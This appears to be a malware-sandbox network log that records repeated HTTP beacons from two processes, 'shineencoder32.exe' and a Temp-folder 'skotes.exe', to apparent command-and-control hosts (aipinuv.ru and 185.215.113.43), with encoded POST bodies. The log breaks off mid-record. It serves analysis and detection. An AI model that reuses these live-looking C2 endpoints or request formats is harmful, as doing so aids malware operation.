Nov 15, 2024 14:12:14.895629883 CET	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 15 Nov 2024 13:12:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
101	192.168.2.4	50214	185.208.158.202	80	7476	C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:12:15.020416975 CET	321	OUT	GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1 Host: aipinuv.ru User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 15, 2024 14:12:15.936058998 CET	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 15 Nov 2024 13:12:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
102	192.168.2.4	50215	185.215.113.43	80	2504	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:12:15.423841953 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 33 32 45 37 31 42 38 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B32E71B85182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Nov 15, 2024 14:12:16.361131907 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 15 Nov 2024 13:12:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
103	192.168.2.4	50216	185.208.158.202	80	7476	C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:12:16.053020954 CET	321	OUT	GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1 Host: aipinuv.ru User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 15, 2024 14:12:16.969639063 CET	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 15 Nov 2024 13:12:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
104	192.168.2.4	50217	185.208.158.202	80	7476	C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:12:17.098121881 CET	321	OUT	GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1 Host: aipinuv.ru User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 15, 2024 14:12:18.015491009 CET	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 15 Nov 2024 13:12:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
105	192.168.2.4	50218	185.215.113.43	80	2504	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:12:17.987895966 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 15, 2024 14:12:18.920061111 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 15 Nov 2024 13:12:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
106	192.168.2.4	50219	185.208.158.202	80	7476	C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:12:18.133779049 CET	321	OUT	GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1 Host: aipinuv.ru User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 15, 2024 14:12:19.060475111 CET	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 15 Nov 2024 13:12:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
107	192.168.2.4	50220	185.208.158.202	80	7476	C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:12:19.177818060 CET	321	OUT	GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1 Host: aipinuv.ru User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 15, 2024 14:12:20.098195076 CET	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 15 Nov 2024 13:12:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
108	192.168.2.4	50221	185.208.158.202	80	7476	C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:12:20.223527908 CET	321	OUT	GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1 Host: aipinuv.ru User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 15, 2024 14:12:21.161168098 CET	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 15 Nov 2024 13:12:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
109	192.168.2.4	50222	185.215.113.43	80	2504	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:12:20.438641071 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 33 32 45 37 31 42 38 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B32E71B85182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Nov 15, 2024 14:12:21.373796940 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 15 Nov 2024 13:12:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
110	192.168.2.4	50223	185.208.158.202	80	7476	C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:12:21.284102917 CET	321	OUT	GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1 Host: aipinuv.ru User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 15, 2024 14:12:22.201463938 CET	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 15 Nov 2024 13:12:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
111	192.168.2.4	50224	185.208.158.202	80	7476	C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:12:22.318952084 CET	321	OUT	GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1 Host: aipinuv.ru User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 15, 2024 14:12:23.234890938 CET	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 15 Nov 2024 13:12:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
112	192.168.2.4	50225	185.215.113.43	80	2504	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:12:23.005959988 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 15, 2024 14:12:23.952724934 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 15 Nov 2024 13:12:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
113	192.168.2.4	50226	185.208.158.202	80	7476	C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:12:23.357116938 CET	321	OUT	GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1 Host: aipinuv.ru User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 15, 2024 14:12:24.290646076 CET	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 15 Nov 2024 13:12:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
114	192.168.2.4	50227	185.208.158.202	80	7476	C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:12:24.411803007 CET	321	OUT	GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1 Host: aipinuv.ru User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 15, 2024 14:12:25.333780050 CET	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 15 Nov 2024 13:12:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
115	192.168.2.4	50228	185.208.158.202	80	7476	C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:12:25.460823059 CET	321	OUT	GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1 Host: aipinuv.ru User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 15, 2024 14:12:26.382445097 CET	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 15 Nov 2024 13:12:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
116	192.168.2.4	50229	185.215.113.43	80	2504	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:12:25.473088026 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 33 32 45 37 31 42 38 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B32E71B85182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Nov 15, 2024 14:12:26.413621902 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 15 Nov 2024 13:12:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
117	192.168.2.4	50230	185.208.158.202	80	7476	C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:12:26.502099037 CET	321	OUT	GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1 Host: aipinuv.ru User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 15, 2024 14:12:27.417197943 CET	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 15 Nov 2024 13:12:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
118	192.168.2.4	50231	185.208.158.202	80	7476	C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:12:27.537724972 CET	321	OUT	GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1 Host: aipinuv.ru User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 15, 2024 14:12:28.682460070 CET	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 15 Nov 2024 13:12:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20
Nov 15, 2024 14:12:28.683521032 CET	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 15 Nov 2024 13:12:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
119	192.168.2.4	50232	185.215.113.43	80	2504	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:12:28.034888983 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 15, 2024 14:12:28.957284927 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 15 Nov 2024 13:12:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
120	192.168.2.4	50234	185.208.158.202	80	7476	C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:12:28.802812099 CET	321	OUT	GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1 Host: aipinuv.ru User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 15, 2024 14:12:29.730598927 CET	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 15 Nov 2024 13:12:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
121	192.168.2.4	50235	185.208.158.202	80	7476	C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:12:29.927294970 CET	321	OUT	GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1 Host: aipinuv.ru User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 15, 2024 14:12:30.838819027 CET	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 15 Nov 2024 13:12:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
122	192.168.2.4	50236	185.215.113.43	80	2504	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:12:30.473627090 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 33 32 45 37 31 42 38 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B32E71B85182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Nov 15, 2024 14:12:31.395251036 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 15 Nov 2024 13:12:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
123	192.168.2.4	50238	185.208.158.202	80	7476	C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:12:30.956980944 CET	321	OUT	GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1 Host: aipinuv.ru User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 15, 2024 14:12:31.889456034 CET	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 15 Nov 2024 13:12:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
124	192.168.2.4	50239	185.208.158.202	80	7476	C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:12:32.005084991 CET	321	OUT	GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1 Host: aipinuv.ru User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 15, 2024 14:12:32.948132992 CET	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 15 Nov 2024 13:12:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
125	192.168.2.4	50242	185.215.113.43	80	2504	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
